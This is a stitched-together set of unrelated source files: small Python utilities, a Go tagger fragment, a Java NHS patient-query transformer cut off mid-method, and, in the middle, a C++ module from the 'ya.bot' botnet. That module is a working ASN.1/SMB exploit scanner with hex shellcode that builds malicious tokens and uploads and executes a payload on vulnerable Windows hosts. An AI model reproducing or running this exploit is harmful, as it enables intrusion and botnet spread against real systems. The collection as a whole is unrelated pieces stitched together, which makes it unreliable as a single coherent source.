# Intrinsic impedance of a medium from its relative permittivity (er) and
# relative permeability (ur); the defaults describe free space.
from math import sqrt
from scipy.constants import epsilon_0 as e0, mu_0 as u0


def intrinsic_impedance(er=1, ur=1):
    return sqrt((ur * u0) / (er * e0))
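A quick usage sketch (illustrative values, not from the original file): with the defaults the function returns the wave impedance of free space.

if __name__ == "__main__":
    # Free space: sqrt(u0 / e0) is the familiar ~376.73 ohms.
    print(intrinsic_impedance())
    # Raising the relative permittivity lowers the impedance by 1/sqrt(er).
    print(intrinsic_impedance(er=4.0))  # about half the free-space value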
P = 10**9 + 7

# Precompute factorials and modular inverse factorials up to 200000.
fac = [1]
ifac = [1]
ff = 1
for i in range(1, 200001):
    ff *= i
    ff %= P
    fac.append(ff)
    ifac.append(pow(ff, P - 2, P))


def ncr(n, r):
    return fac[n] * ifac[r] % P * ifac[n - r] % P


h, w, a, b = map(int, input().split())
s = 0
nC = b - 1
kC = 0
nD = w - b - 1 + h - 1
kD = h - 1
for i in range(h - a):
    C = ncr(nC, kC)
    D = ncr(nD, kD)
    s = (s + C * D) % P
    nC += 1
    kC += 1
    kD -= 1
    nD -= 1
print(s)
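An illustrative sanity check for the modular nCr tables above (not part of the original submission, and it would have to run before the input-reading lines): ncr should agree with Python's exact math.comb reduced mod P.

import math

for n in range(50):
    for r in range(n + 1):
        assert ncr(n, r) == math.comb(n, r) % P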
/* ya.bot */ #include "..\bot\bot.h" #ifndef NO_EXPSCAN #ifndef NO_EXPSCANASN1 //botbotbotbotbotbotbotbotbotbotbotbotbot //Original code by ScriptGod //botbotbotbotbotbotbotbotbotbotbotbotbot #include <cmath> #include <string> class BitString { public: BitString(); BitString(const char *pszString); BitString(void *pData, int nDataLen); BitString(void *pPre, int nPreLen, void *pData, int nDataLen); void Free(); bool ASN1(); bool Bits(); bool Append(const char *pszString); bool Append(void *pData, int nDataLen); bool Append(BitString Str); bool Constr(); bool Constr(BitString Str); void *m_pData; int m_nDataLen; }; BitString::BitString() { m_nDataLen = 0; m_pData = NULL; } BitString::BitString(const char *pszString) { *this = BitString((void*)pszString, strlen(pszString)); } BitString::BitString(void *pData, int nDataLen) { void *pBuffer; pBuffer = malloc(nDataLen); if (!pBuffer) return; memset(pBuffer, 0, nDataLen); memcpy(pBuffer, pData, nDataLen); m_nDataLen = nDataLen; m_pData = pBuffer; } BitString::BitString(void *pPre, int nPreLen, void *pData, int nDataLen) { void *pBuffer; pBuffer = malloc(nPreLen + nDataLen); if (!pBuffer) return; memset(pBuffer, 0, nPreLen + nDataLen); memcpy(pBuffer, pPre, nPreLen); memcpy(((char*)pBuffer) + nPreLen, pData, nDataLen); m_nDataLen = nPreLen + nDataLen; m_pData = pBuffer; } void BitString::Free() { if (m_pData) free(m_pData); m_nDataLen = 0; m_pData = NULL; } bool BitString::ASN1() { int nNumStrLen; unsigned char *pNewData; if (m_nDataLen >= 0xFFFF) return FALSE; if (m_nDataLen < 0x7F) nNumStrLen = 1; else nNumStrLen = 3; pNewData = (unsigned char *)malloc(m_nDataLen + nNumStrLen); if (!pNewData) return FALSE; memset(pNewData, 0, m_nDataLen + nNumStrLen); if (nNumStrLen == 1) { pNewData[ 0 ] = m_nDataLen; memcpy(pNewData + 1, m_pData, m_nDataLen); } else { pNewData[0] = 0x82; pNewData[1] = m_nDataLen >> 8; pNewData[2] = m_nDataLen & 0xFF; memcpy(pNewData + 3, m_pData, m_nDataLen); } free(m_pData); m_nDataLen = nNumStrLen + m_nDataLen; m_pData = pNewData; return TRUE; } bool BitString::Bits() { unsigned char *pNewData; BitString StrTemp("\x00", 1, m_pData, m_nDataLen); StrTemp.ASN1(); pNewData = (unsigned char *)malloc(StrTemp.m_nDataLen + 1); if (!pNewData) return FALSE; memset(pNewData, 0, StrTemp.m_nDataLen + 1); pNewData[0] = '\x03'; memcpy(pNewData + 1, StrTemp.m_pData, StrTemp.m_nDataLen); Free(); m_nDataLen = StrTemp.m_nDataLen + 1; m_pData = pNewData; StrTemp.Free(); return TRUE; } bool BitString::Append(void *pData, int nDataLen) { BitString Temp(m_pData, m_nDataLen, pData, nDataLen); Free(); *this = Temp; return TRUE; } bool BitString::Append(const char *pszString) { return Append((void*)pszString, strlen(pszString)); } bool BitString::Append(BitString Str) { return Append(Str.m_pData, Str.m_nDataLen); } bool BitString::Constr() { if (!ASN1()) return FALSE; BitString StrTemp2("\x23", 1, m_pData, m_nDataLen); Free(); *this = StrTemp2; return TRUE; } bool BitString::Constr(BitString Str) { if (!Append(Str)) return FALSE; return Constr(); } BitString Token(void *pStage0, int nStage0Len, void *pStage1, int nStage1Len) { char bk[] = "\xf8\x0f\x01"; char fw[] = "\xf8\x0f\x01\x00"; char peblock[] = "\x20\xf0\xfd\x7f"; char tag[] = "\x90\x42\x90\x42\x90\x42\x90\x42"; char szRandom[GIABUF]; BitString Token; BitString Temp_Constr_FWBK; BitString Temp_Bits_TagStage1; BitString Temp_Constr_Unknown; BitString Temp_Bits_PEBlockStage0; BitString Temp_Constr_PEBlockStage0_Unknown; BitString Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1; BitString 
CompleteBitString; BitString Temp_Token1; BitString Temp_Token2; if (nStage0Len > 1032 || sizeof(tag) - 1 + nStage1Len > 1032) return Token; Temp_Constr_FWBK.Append(fw, sizeof(fw) - 1); Temp_Constr_FWBK.Append(bk, sizeof(bk) - 1); Temp_Constr_FWBK.Bits(); Temp_Constr_FWBK.Constr(); memset(szRandom, 'B', sizeof(szRandom)); Temp_Bits_TagStage1.Append(tag, sizeof(tag) - 1); Temp_Bits_TagStage1.Append(pStage1, nStage1Len); Temp_Bits_TagStage1.Append(szRandom, 1033 - Temp_Bits_TagStage1.m_nDataLen); Temp_Bits_TagStage1.Bits(); Temp_Constr_Unknown.Append("\xEB\x06\x90\x90\x90\x90\x90\x90"); Temp_Constr_Unknown.Bits(); memset(szRandom, 'D', sizeof(szRandom)); BitString Bits_Unknown2(szRandom, 1040); Bits_Unknown2.Bits(); Temp_Constr_Unknown.Constr(Bits_Unknown2); Bits_Unknown2.Free(); memset(szRandom, 'C', sizeof(szRandom)); Temp_Bits_PEBlockStage0.Append("CCCC"); Temp_Bits_PEBlockStage0.Append(peblock, sizeof(peblock) - 1); Temp_Bits_PEBlockStage0.Append(pStage0, nStage0Len); Temp_Bits_PEBlockStage0.Append(szRandom, 1032 - nStage0Len); Temp_Bits_PEBlockStage0.Bits(); Temp_Constr_PEBlockStage0_Unknown.Append(Temp_Bits_PEBlockStage0); Temp_Constr_PEBlockStage0_Unknown.Append(Temp_Constr_Unknown); Temp_Constr_PEBlockStage0_Unknown.Constr(); Temp_Bits_PEBlockStage0.Free(); Temp_Constr_Unknown.Free(); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Append(Temp_Bits_TagStage1); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Append(Temp_Constr_FWBK); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Append(Temp_Constr_PEBlockStage0_Unknown); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Constr(); Temp_Bits_TagStage1.Free(); Temp_Constr_FWBK.Free(); Temp_Constr_PEBlockStage0_Unknown.Free(); memset(szRandom, 'A', sizeof(szRandom)); CompleteBitString.Append(szRandom, 1024); CompleteBitString.Bits(); CompleteBitString.Append("\x03\x00", 2); CompleteBitString.Append(Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1); CompleteBitString.Constr(); Temp_Constr_PEBlockStage0_Unknown_FWBK_TagStage1.Free(); Temp_Token1.Append(CompleteBitString); Temp_Token1.ASN1(); CompleteBitString.Free(); Temp_Token2.Append("\xA1"); Temp_Token2.Append(Temp_Token1); Temp_Token2.ASN1(); Temp_Token1.Free(); Temp_Token1.Append("\x30"); Temp_Token1.Append(Temp_Token2); Temp_Token1.ASN1(); Temp_Token2.Free(); Temp_Token2.Append("\x06\x06\x2B\x06\x01\x05\<KEY>"); Temp_Token2.Append(Temp_Token1 ); Temp_Token2.ASN1(); Temp_Token1.Free(); Token.Append("\x60"); Token.Append(Temp_Token2); Temp_Token2.Free(); return Token; } int asn1_recvsmb(SOCKET sock, char *pszBuffer, int nLength, int nFlags) { fd_set fdset_read, fdset_write; TIMEVAL timeout; FD_ZERO(&fdset_read); FD_ZERO(&fdset_write); FD_SET(sock, &fdset_read); FD_SET(sock, &fdset_write); timeout.tv_sec = 10; timeout.tv_usec = 0; if (select(sock + 1, &fdset_read, NULL, &fdset_write, &timeout) == SOCKET_ERROR) return FALSE; if (!FD_ISSET(sock, &fdset_read)) return FALSE; return recv(sock, pszBuffer, nLength, nFlags); } bool asn1_sendsmb(SOCKET sock, void *pBuffer, int nLength) { DWORD dwNetNum; dwNetNum = htonl(nLength); if (send(sock, (char *)&dwNetNum, sizeof(dwNetNum), 0) != sizeof(dwNetNum)) return FALSE; return (send(sock, (char *)pBuffer, nLength, 0) == nLength); } bool expscan_asn1(SExpScanInfo s_esi) { char smb_request[] = "\x81\x00\x00\x44\x20\x43\x4B\x46\x44\x45\x4E\x45\x43\x46\x44\x45" "\x46\x46\x43\x46\x47\x45\x46\x46\x43\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x00\x20\x43\x41\x43\x41\x43\x41\x43\x41\x43" 
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43" "\x41\x43\x41\x43\x41\x41\x41\x00"; char smb_negotiate[] = "\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x37\x13\x00\x00\x00\x00" "\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50" "\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4C\x41\x4E\x4D" "\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F\x77\x73\x20\x66" "\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70\x73\x20\x33\x2E" "\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00\x02\x4C" "\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54\x20\x4C\x4D\x20" "\x30\x2E\x31\x32\x00"; char smb_session1[] = "\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x37\x13\x00\x00\x00\x00" "\x0C\xFF\x00\x00\x00\x04\x11\x0A\x00\x00\x00\x00\x00\x00\00"; char smb_session2[] = "\x00\x00\x00\x00\xD4\x00\x00\x80"; char smb_session3[] = "\x00\x00\x00\x00\x00\x00"; char shellcode_stage0[] = "\x53\x56\x57\x66\x81\xEC\x80\x00\x89\xE6\xE8\xED\x00\x00\x00\xFF" "\x36\x68\x09\x12\xD6\x63\xE8\xF7\x00\x00\x00\x89\x46\x08\xE8\xA2" "\x00\x00\x00\xFF\x76\x04\x68\x6B\xD0\x2B\xCA\xE8\xE2\x00\x00\x00" "\x89\x46\x0C\xE8\x3F\x00\x00\x00\xFF\x76\x04\x68\xFA\x97\x02\x4C" "\xE8\xCD\x00\x00\x00\x31\xDB\x68\x10\x04\x00\x00\x53\xFF\xD0\x89" "\xC3\x56\x8B\x76\x10\x89\xC7\xB9\x10\x04\x00\x00\xF3\xA4\x5E\x31" "\xC0\x50\x50\x50\x53\x50\x50\xFF\x56\x0C\x8B\x46\x08\x66\x81\xC4" "\x80\x00\x5F\x5E\x5B\xFF\xE0\x60\xE8\x23\x00\x00\x00\x8B\x44\x24" "\x0C\x8D\x58\x7C\x83\x43\x3C\x05\x81\x43\x28\x00\x10\x00\x00\x81" "\x63\x28\x00\xF0\xFF\xFF\x8B\x04\x24\x83\xC4\x14\x50\x31\xC0\xC3" "\x31\xD2\x64\xFF\x32\x64\x89\x22\x31\xDB\xB8\x90\x42\x90\x42\x31" "\xC9\xB1\x02\x89\xDF\xF3\xAF\x74\x03\x43\xEB\xF3\x89\x7E\x10\x64" "\x8F\x02\x58\x61\xC3\x60\xBF\x20\xF0\xFD\x7F\x8B\x1F\x8B\x46\x08" "\x89\x07\x8B\x7F\xF8\x81\xC7\x78\x01\x00\x00\x89\xF9\x39\x19\x74" "\x04\x8B\x09\xEB\xF8\x89\xFA\x39\x5A\x04\x74\x05\x8B\x52\x04\xEB" "\xF6\x89\x11\x89\x4A\x04\xC6\x43\xFD\x01\x61\xC3\xA1\x0C\xF0\xFD" "\x7F\x8B\x40\x1C\x8B\x58\x08\x89\x1E\x8B\x00\x8B\x40\x08\x89\x46" "\x04\xC3\x60\x8B\x6C\x24\x28\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA" "\x8B\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x38\x49\x8B\x34\x8B\x01\xEE" "\x31\xFF\x31\xC0\xFC\xAC\x38\xE0\x74\x07\xC1\xCF\x0D\x01\xC7\xEB" "\xF4\x3B\x7C\x24\x24\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B" "\x8B\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24\x1C\x61\xC2" "\x08\x00\xEB\xFE"; BitString BitToken; char *pszPacket, szRecvBuffer[MEDBUF], szShellCode[BIGBUF]; int nPos = 0, nShellcodeSize, nSize, nTargetOS = OS_UNKNOWN; #ifndef NO_DEBUG debug_print("Exploit scanning ASN1, expscan_asn1()"); #endif if (s_esi.m_nPort != 445) { nTargetOS = fphost(s_esi.m_szIP, s_esi.m_nPort); if ((nTargetOS == OS_UNKNOWN) || (nTargetOS == OS_WINNT) || (nTargetOS == OS_WIN2003) || (nTargetOS == OS_WINVISTA)) return FALSE; } if (s_esi.m_csock == INVALID_SOCKET) return FALSE; if (s_esi.m_nPort == 139) { if (send(s_esi.m_csock, smb_request, sizeof(smb_request) - 1, 0) == SOCKET_ERROR) return FALSE; if (asn1_recvsmb(s_esi.m_csock, szRecvBuffer, sizeof(szRecvBuffer) - 1, 0) == SOCKET_ERROR) return FALSE; } memcpy(szShellCode, shellcode_uploadexecute, sizeof(shellcode_uploadexecute) - 1); nShellcodeSize = sizeof(shellcode_uploadexecute) - 1; BitToken = Token(shellcode_stage0, sizeof(shellcode_stage0) - 1, szShellCode, nShellcodeSize); if (!BitToken.m_nDataLen) return FALSE; nSize = sizeof(smb_session1) - 1 + 2 
+ sizeof(smb_session2) - 1 + 2 + BitToken.m_nDataLen + sizeof(smb_session3) - 1; pszPacket = (char *)malloc(nSize); if (!pszPacket) return FALSE; memset(pszPacket, 0, nSize); memcpy(pszPacket, smb_session1, sizeof(smb_session1) - 1); nPos += sizeof(smb_session1) - 1; *(short*)(&pszPacket[nPos]) = BitToken.m_nDataLen; nPos += 2; memcpy(pszPacket + nPos, smb_session2, sizeof(smb_session2) - 1); nPos += sizeof(smb_session2 ) - 1; *(short*)(&pszPacket[nPos]) = BitToken.m_nDataLen; nPos += 2; memcpy(pszPacket + nPos, BitToken.m_pData, BitToken.m_nDataLen); nPos += BitToken.m_nDataLen; memcpy(pszPacket + nPos, smb_session3, sizeof(smb_session3) - 1); nPos += sizeof(smb_session3) - 1; if (!asn1_sendsmb(s_esi.m_csock, smb_negotiate, sizeof(smb_negotiate) - 1)) { free(pszPacket); return FALSE; } if (asn1_recvsmb(s_esi.m_csock, szRecvBuffer, sizeof(szRecvBuffer) - 1, 0) == SOCKET_ERROR) { free(pszPacket); return FALSE; } if (!asn1_sendsmb(s_esi.m_csock, pszPacket, nSize)) { free(pszPacket); return FALSE; } if (asn1_recvsmb(s_esi.m_csock, szRecvBuffer, sizeof(szRecvBuffer) - 1, 0) == SOCKET_ERROR) { free(pszPacket); return FALSE; } free(pszPacket); BitToken.Free(); if (!transfer_directtransfer(s_esi.m_szIP, SHELLCODE_UPLOADPORT, s_esi.m_szExploitName, s_esi.m_bsock, s_esi.m_szResultChannel, s_esi.m_bSilent, s_esi.m_bVerbose)) return FALSE; return TRUE; } #endif #endif
import subprocess


def port_is_in_bridge(bridge, interface_name) -> bool:
    # An empty or missing interface name can never match.
    if not interface_name:
        return False
    dump1 = subprocess.Popen(
        ["ovs-ofctl", "show", bridge],
        stdout=subprocess.PIPE,
    )
    for line1 in dump1.stdout.readlines():
        if interface_name not in str(line1):
            continue
        return True
    return False
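A hypothetical call site (the bridge and port names here are invented; the function shells out to the ovs-ofctl CLI, so Open vSwitch must be installed):

if port_is_in_bridge("br-int", "eth0"):
    print("eth0 is attached to br-int")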
package pos

import (
	"github.com/chewxy/lingo"
	// "log"
)

func (p *Tagger) getSentences() {
	defer close(p.sentences)

	var sentence lingo.AnnotatedSentence
	sentence = append(sentence, lingo.RootAnnotation())
	for lexeme := range p.Input {
		if lexeme.LexemeType != lingo.EOF {
			a := lingo.NewAnnotation()
			a.Lexeme = lexeme
			if err := a.Process(p); err != nil {
				panic(err) // for now
			}
			sentence = append(sentence, a)
		} else {
			p.sentences <- sentence
			// reset
			sentence = lingo.AnnotatedSentence{lingo.RootAnnotation()}
		}
		// TODO: Sentence splitting
	}
}
/**
 *
 */
package OctopusConsortium.Core.Transformers.RCS;

import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.Calendar;
import java.util.Date;
import java.util.UUID;

import javax.xml.bind.JAXBElement;

import org.mule.api.transformer.TransformerException;
import org.mule.transformer.AbstractTransformer;
import org.mule.transformer.types.DataTypeFactory;

import OctopusConsortium.Core.CommonValues;
import OctopusConsortium.Models.RCS.COCDTP145200GB01AssignedAuthor;
import OctopusConsortium.Models.RCS.CsEntityNameUse;
import OctopusConsortium.Models.RCS.CsNullFlavor;
import OctopusConsortium.Models.RCS.EnGiven;
import OctopusConsortium.Models.RCS.IINPfITOidRequiredAssigningAuthorityName;
import OctopusConsortium.Models.RCS.IINPfITUuidMandatory;
import OctopusConsortium.Models.RCS.ObjectFactory;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonBirthTime;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonFamilyName;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonGivenName;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonId;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonId.Value;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonPostalCode;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01PersonStreetAddressLine1;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery.Code;
import OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery.EffectiveTime;
import OctopusConsortium.Models.RCS.ST;
import OctopusConsortium.Service.Models.IdentifyPatientResponse;
import OctopusConsortium.Service.Models.Patient;
import OctopusConsortium.Service.Models.SubmitEncounterResponse;

/**
 * @author stuart.yeates
 */
public class IdentifyPatientResponseToRepeatCallerQuery extends AbstractTransformer {

    private CommonValues commonValues;
    protected String ods;
    protected String orgName;

    public String getOds() {
        return ods;
    }

    public void setOds(String ods) {
        this.ods = ods;
    }

    public String getOrgName() {
        return orgName;
    }

    public void setOrgName(String orgName) {
        this.orgName = orgName;
    }

    public IdentifyPatientResponseToRepeatCallerQuery() {
        super();
        this.registerSourceType(DataTypeFactory.create(OctopusConsortium.Service.Models.IdentifyPatientResponse.class));
        this.registerSourceType(DataTypeFactory.create(OctopusConsortium.Service.Models.SubmitEncounterResponse.class));
        this.registerSourceType(DataTypeFactory.create(OctopusConsortium.Service.Models.Patient.class));
        this.setReturnDataType(DataTypeFactory.create(OctopusConsortium.Models.RCS.QUPAMT000001GB01RepeatCallerQuery.class));
    }

    /* (non-Javadoc)
     * @see org.mule.transformer.AbstractMessageTransformer#transformMessage(org.mule.api.MuleMessage, java.lang.String)
     */
    @Override
    public Object doTransform(Object payload, String outputEncoding) throws TransformerException {
        Patient msg = null;
        commonValues = new CommonValues(ods, orgName);

//      if (payload instanceof OctopusConsortium.Models.RepeatCallerRequest) {
//          msg = ((IdentifyPatientResponseEnvelope) ((OctopusConsortium.Models.RepeatCallerRequest) payload).getPatientIdentity()).getPatient();
//      } else
        if (payload instanceof IdentifyPatientResponse) {
            msg = ((IdentifyPatientResponse) payload).getPatient();
        } else if (payload instanceof SubmitEncounterResponse) {
            msg = ((SubmitEncounterResponse) payload).getPatient();
        } else {
            msg = (Patient) payload;
        }

        return PopulateCallerQuery(msg);
    }

    // Populates root attributes and properties
    private QUPAMT000001GB01RepeatCallerQuery PopulateCallerQuery(Patient msg) {
        ObjectFactory of = new ObjectFactory();
        QUPAMT000001GB01RepeatCallerQuery rcQuery = of.createQUPAMT000001GB01RepeatCallerQuery();
        rcQuery.setClassCode("CACT");
        rcQuery.setMoodCode("EVN");
        rcQuery.setCode(new Code());
        rcQuery.getCode().setCode("01");
        rcQuery.getCode().setCodeSystem("2.16.840.1.113883.2.1.3.2.4.17.420");

        Date now = Calendar.getInstance().getTime();
        DateFormat df = new SimpleDateFormat("yyyyMMddHHmmss");
        EffectiveTime edate = of.createQUPAMT000001GB01RepeatCallerQueryEffectiveTime();
        edate.setValue(df.format(now));
        rcQuery.setEffectiveTime(edate);

        rcQuery.setId(new IINPfITUuidMandatory());
        rcQuery.getId().setRoot(UUID.randomUUID().toString().toUpperCase());

        rcQuery.setQuery(of.createQUPAMT000001GB01Query());
        rcQuery.getQuery().setPersonBirthTime(PopulatePersonBirthTime(of, msg));
        rcQuery.getQuery().setPersonFamilyName(PopulatePersonFamilyName(of, msg));
        rcQuery.getQuery().setPersonGivenName(PopulatePersonGivenName(of, msg));
        rcQuery.getQuery().setPersonId(PopulatePersonID(of, msg));
        rcQuery.getQuery().setPersonPostalCode(PopulatePersonPostalCode(of, msg));
        rcQuery.getQuery().setPersonStreetAddressLine1(PopulatePersonAddressLine1(of, msg));

        rcQuery.setAuthor(of.createQUPAMT000001GB01Author());
        rcQuery.getAuthor().setTypeCode("AUT");
        rcQuery.getAuthor().getContextControlCode().add("OP");
        rcQuery.getAuthor().setContentId(of.createTemplateContent());
        //rcQuery.getAuthor().getContentId().setAssigningAuthorityName(AssigningAuthorityName);
        rcQuery.getAuthor().getContentId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.16");
        rcQuery.getAuthor().getContentId().setExtension("COCD_TP145200GB01#AssignedAuthor");

        // the AuthorPersonUniversal (COCD_TP145200GB01) schema is represented by class COCDTP145200GB01AssignedAuthor
        rcQuery.getAuthor().setCOCDTP145200GB01AssignedAuthor(CreateAuthorPersonUniversal(of));

        return rcQuery;
    }

    private COCDTP145200GB01AssignedAuthor CreateAuthorPersonUniversal(ObjectFactory of) {
        COCDTP145200GB01AssignedAuthor authorTemplate = of.createCOCDTP145200GB01AssignedAuthor();
        authorTemplate.setClassCode("ASSIGNED");
        authorTemplate.setCode(of.createCVNPfITCodedplainRequired());
        authorTemplate.getCode().setNullFlavor(CsNullFlavor.NI);

        IINPfITOidRequiredAssigningAuthorityName aname = of.createIINPfITOidRequiredAssigningAuthorityName();
        aname.setNullFlavor(CsNullFlavor.NI);
        authorTemplate.getId().add(aname);

        /*
        IINPfITOidRequiredAssigningAuthorityName aname = of.createIINPfITOidRequiredAssigningAuthorityName();
        aname.setRoot("2.16.840.1.113883.2.1.3.2.4.18.24");
        aname.setExtension(CommonValues.ODS_ORGANISATION_CODE);
        aname.setAssigningAuthorityName(CommonValues.ODS_ASSIGNING_AUTHORITY_NAME);
        authorTemplate.getId().add(aname);
        */

        authorTemplate.setTemplateId(of.createCOCDTP145200GB01AssignedAuthorTemplateId());
        authorTemplate.getTemplateId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.2");
        authorTemplate.getTemplateId().setExtension("COCD_TP145200GB01#AssignedAuthor");

        // person is required so create an empty person
        authorTemplate.setAssignedPerson(of.createCOCDTP145200GB01Person());
        authorTemplate.getAssignedPerson().setClassCode("PSN");
        authorTemplate.getAssignedPerson().setDeterminerCode("INSTANCE");
        authorTemplate.getAssignedPerson().setName(of.createPN());
        authorTemplate.getAssignedPerson().getName().getUse().add(CsEntityNameUse.L);
        EnGiven given = of.createEnGiven();
        given.setContent(""); // set a blank name
        authorTemplate.getAssignedPerson().getName().getContent().add(of.createENGiven(given));
        authorTemplate.getAssignedPerson().setTemplateId(of.createCOCDTP145200GB01PersonTemplateId());
        authorTemplate.getAssignedPerson().getTemplateId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.2");
        authorTemplate.getAssignedPerson().getTemplateId().setExtension("COCD_TP145200GB01#assignedPerson");

        authorTemplate.setRepresentedOrganization(of.createCOCDTP145200GB01Organization());
        authorTemplate.getRepresentedOrganization().setClassCode("ORG");
        authorTemplate.getRepresentedOrganization().setDeterminerCode("INSTANCE");
        authorTemplate.getRepresentedOrganization().setId(of.createCOCDTP145200GB01OrganizationId());
        //authorTemplate.getRepresentedOrganization().getId().setAssigningAuthorityName(CommonValues.ODS_ASSIGNING_AUTHORITY_NAME);
        authorTemplate.getRepresentedOrganization().getId().setRoot("2.16.840.1.113883.2.1.3.2.4.19.1");
        authorTemplate.getRepresentedOrganization().getId().setExtension(commonValues.ODS_ORGANISATION_CODE);
        authorTemplate.getRepresentedOrganization().setName(of.createON());
        authorTemplate.getRepresentedOrganization().getName().getContent().add(commonValues.getOrganisation_Name());
        authorTemplate.getRepresentedOrganization().setTemplateId(of.createCOCDTP145200GB01OrganizationTemplateId());
        authorTemplate.getRepresentedOrganization().getTemplateId().setRoot("2.16.840.1.113883.2.1.3.2.4.18.2");
        authorTemplate.getRepresentedOrganization().getTemplateId().setExtension("COCD_TP145200GB01#representedOrganization");

        return authorTemplate;
    }

    private JAXBElement<QUPAMT000001GB01PersonBirthTime> PopulatePersonBirthTime(ObjectFactory of, Patient patient) {
        JAXBElement<QUPAMT000001GB01PersonBirthTime> jaxbe_birthTime = null;
        if (patient.getDOB() != null) {
            QUPAMT000001GB01PersonBirthTime birthTime = of.createQUPAMT000001GB01PersonBirthTime();
            QUPAMT000001GB01PersonBirthTime.Value ts = of.createQUPAMT000001GB01PersonBirthTimeValue();
            DateFormat yyyyMMdd = new SimpleDateFormat("yyyyMMdd ");
            ts.setValue(yyyyMMdd.format(patient.getDOB().toGregorianCalendar().getTime()).trim());
            birthTime.setValue(ts);
            birthTime.setSemanticsText(of.createST());
            birthTime.getSemanticsText().setContent("Person.birthTime");
            jaxbe_birthTime = of.createQUPAMT000001GB01QueryPersonBirthTime(birthTime);
        }
        return jaxbe_birthTime;
    }

    private JAXBElement<QUPAMT000001GB01PersonFamilyName> PopulatePersonFamilyName(ObjectFactory of, Patient patient) {
        JAXBElement<QUPAMT000001GB01PersonFamilyName> jaxbe_famName = null;
        if (patient.getSurname() != null) {
            QUPAMT000001GB01PersonFamilyName famName = of.createQUPAMT000001GB01PersonFamilyName();
            famName.setValue(new ST());
            famName.getValue().setContent(patient.getSurname());
            famName.setSemanticsText(of.createST());
            famName.getSemanticsText().setContent("Person.familyName");
            jaxbe_famName = of.createQUPAMT000001GB01QueryPersonFamilyName(famName);
        }
        return jaxbe_famName;
    }

    private JAXBElement<QUPAMT000001GB01PersonGivenName> PopulatePersonGivenName(ObjectFactory of, Patient patient) {
        JAXBElement<QUPAMT000001GB01PersonGivenName> jaxbe_givenName = null;
        if (patient.getForename() != null) {
            QUPAMT000001GB01PersonGivenName givenName = of.createQUPAMT000001GB01PersonGivenName();
            givenName.setValue(new ST());
            givenName.getValue().setContent(patient.getForename());
            givenName.setSemanticsText(of.createST());
            givenName.getSemanticsText().setContent("Person.givenName");
            jaxbe_givenName = of.createQUPAMT000001GB01QueryPersonGivenName(givenName);
        }
        return jaxbe_givenName;
    }

    private JAXBElement<QUPAMT000001GB01PersonId> PopulatePersonID(ObjectFactory of, Patient patient) {
        JAXBElement<QUPAMT000001GB01PersonId> jaxbe_id = null;
        if (patient.getNhsNumber() != null) {
            QUPAMT000001GB01PersonId id = of.createQUPAMT000001GB01PersonId();
            id.setValue(new Value());
            id.getValue().setRoot("2.16.840.1.113883.2.1.4.1");
            id.getValue().setExtension(patient.getNhsNumber());
            id.setSemanticsText(of.createST());
            id.getSemanticsText().setContent("Person.id");
            jaxbe_id = of.createQUPAMT000001GB01QueryPersonId(id);
        }
        return jaxbe_id;
    }

    private JAXBElement<QUPAMT000001GB01PersonPostalCode> PopulatePersonPostalCode(ObjectFactory of, Patient patient) {
        JAXBElement<QUPAMT000001GB01PersonPostalCode> jaxbe_postcode = null;
        if (patient.getAddress() != null && patient.getAddress().getPostalCode() != null) {
            QUPAMT000001GB01PersonPostalCode postalCode = new QUPAMT000001GB01PersonPostalCode();
            postalCode.setValue(new ST());
            postalCode.getValue().setContent(patient.getAddress().getPostalCode());
            postalCode.setSemanticsText(of.createST());
            postalCode.getSemanticsText().setContent("Person.postalCode");
            jaxbe_postcode = of.createQUPAMT000001GB01QueryPersonPostalCode(postalCode);
        }
        return jaxbe_postcode;
    }

    private JAXBElement<QUPAMT000001GB01PersonStreetAddressLine1> PopulatePersonAddressLine1(ObjectFactory of, Patient patient) {
        JAXBElement<QUPAMT000001GB01PersonStreetAddressLine1> jaxbe_add1 = null;
        if (patient.getAddress() != null) {
            QUPAMT000001GB01PersonStreetAddressLine1 add1 = of.createQUPAMT000001GB01PersonStreetAddressLine1();
            add1.setValue(new ST());
            //add1.getValue().setContent(patient.getPatient().getAddress().getHouseNumber()
            //        + " "
            //        + patient.getPatient().getAddress().getStreetName());
            add1.getValue().setContent(patient.getAddress().getStreetAddressLine1());
            add1.setSemanticsText(of.createST());
